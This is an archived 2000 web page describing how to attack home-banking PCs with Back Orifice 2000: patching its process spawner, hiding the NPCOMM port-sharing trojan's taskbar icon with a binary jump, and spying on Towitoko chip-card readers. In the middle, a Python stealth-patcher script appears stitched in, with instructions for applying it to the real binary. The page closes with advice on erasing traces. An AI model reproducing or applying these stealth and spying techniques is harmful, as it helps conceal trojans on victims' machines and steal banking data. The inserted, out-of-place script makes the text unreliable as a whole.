As the security gap is clearly visible, compromising a Windows system will be just a matter of patience, creativity and skill.
Rather than handing you a complete toolbox, we will show some of the technical problems we encountered and how we dealt with them. Every programmer with the attributes mentioned above should be able to meet this challenge in one way or another.
We decided to use Back Orifice 2000 (abbreviated BO2K in the sequel) to demonstrate the attack. We will not discuss the pros and cons of various remote control software here; of course, you can use whatever you like. BO2K did a perfect job, except for two points: listing processes on NT, and starting a process at all. The first can be circumvented by literally telling BO2K the victim's machine name (with the default, BO2K crashes on NT); the second is absolutely necessary, because the port sharing software has to be executed on the victim.
The reason why the process starter did not work was simple: the body had been left out of the function stub in the public BO2K server sources. Adding the missing execute code to the server sources is really simple, provided you have a compiler available. A call to the Win32 API did the job (sinfo must be a zero-initialized STARTUPINFO with its cb member set to sizeof(STARTUPINFO), and the process and thread handles returned in pinfo should be closed with CloseHandle once they are no longer needed):
File (...)/src/commands/process/cmd_process.cpp
Function: CmdProc_ProcessSpawn ()
CreateProcess (svArg2, NULL, NULL, NULL,
true, NULL, NULL, NULL, &sinfo, &pinfo);
Here is our diff against the original source tree.
Note that these patches are obsolete. You should rather use the BO2K development tree, which can be downloaded from cvs.bo2k.sourceforge.net.
Of course, instead of mending the BO2K core, we could also have written a plugin, which is not really hard either, as cDc has already provided the templates.
As with BO2K, the program NPCOMM was our choice for the attack, with one little flaw for an otherwise well designed attack: it shows an icon in the taskbar with an options menu that can be opened with the right mouse button. For perfection, this feature had to be switched off. Admittedly, hardly any real victim would have recognized that little item as malicious.
Now, debugging binaries is more an art than a science, and it is up to you which debugger to use and how to solve such a problem. Stepping through the code of PortServ.exe (which is part of NPCOMM and the only program needed on the victim's side) you will find a sequence like:
...
XOR ESI,ESI
PUSH ESI
PUSH 00410D12
PUSH EAX
PUSH DWORD PTR [EBP+08]
CALL 0041978A
...
As you might guess, this is the point where the taskbar icon and menu get plugged in; the address 00410D12 pushed above is the start of the routine that does it. You have two possibilities. The first is to modify this passage so that the routine is not plugged in at all. That sounds easy until you realize that you would have to clean up the stack by hand (the PUSHes stay while the CALL goes) and, in addition, provide whatever return value the following code expects.
The smarter way is to modify the routine which gets plugged in. In our example it starts at address 0x410d12, does some things of minor interest (like displaying what we don't want to see), and ends cleanly at address 0x410d4c with:
XOR EAX,EAX
RET 0010
The job now is as simple as placing a jmp at the start of the routine (0x410d12) to this epilogue (0x410d4c). The routine then returns immediately, still with EAX = 0 and with its 16 bytes of arguments popped by RET 0010, so neither the caller's stack nor its expectations are disturbed, and no icon ever appears.
Feel free to download our little PsStealth patcher source code, or browse the developer tree.
Information gathering on the chip card and the reader
As experience showed us, all banking institutes use the card reader from Towitoko, and all install Towitoko's universal card API DLL. Using this together with BO2K, you can easily write a plugin that spies out information about the card and the reader, like:
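The patch described above, as an added example that is neither the page's PsStealth patcher nor any NPCOMM code: a Python script that encodes the x86 JMP from 0x410d12 to the epilogue at 0x410d4c, checks that the epilogue really is XOR EAX,EAX / RET 0010 before touching anything, refuses to clobber the epilogue if the routine were too short, and writes the jump into a file image. The section geometry (a .text section at VA 0x410000 stored at file offset 0x400) and the bytes between the two addresses are assumptions, constructed here because the page does not show the real PE headers or the routine body; the epilogue encoding 33 C0 C2 10 00 is the standard one.

```python
"""Patch a routine so it jumps straight to its own epilogue (PsStealth-style).

Added example; not the original PsStealth patcher. Section layout and the
sample image are constructed, only the two addresses come from the page.
"""
import struct

# Addresses as quoted on the page for PortServ.exe.
ROUTINE_VA = 0x410D12          # start of the routine that installs the taskbar icon/menu
EXIT_VA = 0x410D4C             # its epilogue: XOR EAX,EAX / RET 0010
XOR_EAX_EAX = (b"\x33\xC0", b"\x31\xC0")   # both common encodings of XOR EAX,EAX
RET_0010 = b"\xC2\x10\x00"                 # RET 0010 (pops 16 bytes of arguments)

# Assumed (constructed) section geometry; the real PortServ.exe headers are
# not on the page. In practice read these from the PE section table.
SECTION_VA = 0x410000          # virtual address of .text
SECTION_RAW = 0x400            # file offset of .text
SECTION_SIZE = 0x1000


def va_to_offset(va, section_va=SECTION_VA, section_raw=SECTION_RAW, size=SECTION_SIZE):
    """Map a virtual address to a file offset inside the one section we model."""
    if not section_va <= va < section_va + size:
        raise ValueError(f"VA {va:#x} is outside the section")
    return va - section_va + section_raw


def encode_jmp(src_va, dst_va, allow_short=True):
    """Encode an x86 relative JMP placed at src_va that lands on dst_va.

    Displacements are relative to the end of the JMP instruction, so the
    instruction length (2 for EB rel8, 5 for E9 rel32) is part of the sum.
    """
    disp8 = dst_va - (src_va + 2)
    if allow_short and -128 <= disp8 <= 127:
        return b"\xEB" + struct.pack("<b", disp8)
    disp32 = dst_va - (src_va + 5)
    return b"\xE9" + struct.pack("<i", disp32)


def epilogue_ok(image, exit_va):
    """Sanity check: exit_va must really hold XOR EAX,EAX ; RET 0010."""
    off = va_to_offset(exit_va)
    return image[off:off + 2] in XOR_EAX_EAX and image[off + 2:off + 5] == RET_0010


def patch_routine(image, routine_va=ROUTINE_VA, exit_va=EXIT_VA):
    """Overwrite the routine's first bytes with a JMP to its epilogue.

    Returns the JMP bytes written. The epilogue itself is kept, so the caller
    still gets EAX=0 and the 16 bytes of arguments popped by RET 0010.
    """
    if not epilogue_ok(image, exit_va):
        raise ValueError("epilogue at exit_va is not XOR EAX,EAX / RET 0010")
    jmp = encode_jmp(routine_va, exit_va)
    if routine_va + len(jmp) > exit_va:
        raise ValueError("routine too short: the JMP would overwrite the epilogue")
    off = va_to_offset(routine_va)
    image[off:off + len(jmp)] = jmp
    return jmp


def build_sample_image():
    """Constructed stand-in for PortServ.exe: headers, then a .text section whose
    body is NOPs except for the epilogue quoted on the page."""
    image = bytearray(SECTION_RAW) + bytearray(b"\x90" * SECTION_SIZE)
    off = va_to_offset(EXIT_VA)
    image[off:off + 5] = b"\x33\xC0" + RET_0010
    return image


if __name__ == "__main__":
    img = build_sample_image()
    print("writing", patch_routine(img).hex(" "), "at", hex(ROUTINE_VA))
```

Against the real binary you would replace build_sample_image() with the file contents and take the section VA and raw offset from the PE section table; the script picks the two-byte short form (EB 38 for these two addresses) when the displacement fits in a signed byte and E9 rel32 otherwise.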
Status=valid
Port=COM2
Type=CHIPDRIVE micro
ShortName=CDM
Version=4.3
LotNr=9853
Serial=2836
MaxBaudrate=115200
Baudrate=115200
PrID=2/0
Caps=MEM,CPU,
Index=0
Mode=auto
PowerFail=0
SCARD command executed.
or chip card info (here, a German telephone card):
Status=active
LockedBy=0,-
Type=SLE4436
Protocol=ATR
Apps=TWK,
CardCount=1
CardPower=0
MemSize=64
AtrBinarySize=4
AtrBinary=1B F4 3F 54
SCARD command executed.
The plugin template that is available as source code was mentioned earlier already; it simply has to be filled in.
Feel free to download our botowi plugin source code for BO2K, or browse the developer tree.
A real attacker needs to be invisible and to remain undetected. Keep in mind that neither the port sharer nor the Towitoko API are optimized as trojans. They consume a lot of system resources and may print unwanted error messages on the victim's PC due to system inconsistencies and interference with other programs.
So a real attacker will terminate any of those programs as soon as possible, once he has got what he wants. He may even delete the malicious programs that served him, wiping out every trace.
tom Last modified: Mon May 1 17:37:57 CEST 2000
Brought back to your friendly attention by hp 2010/05/03 17:10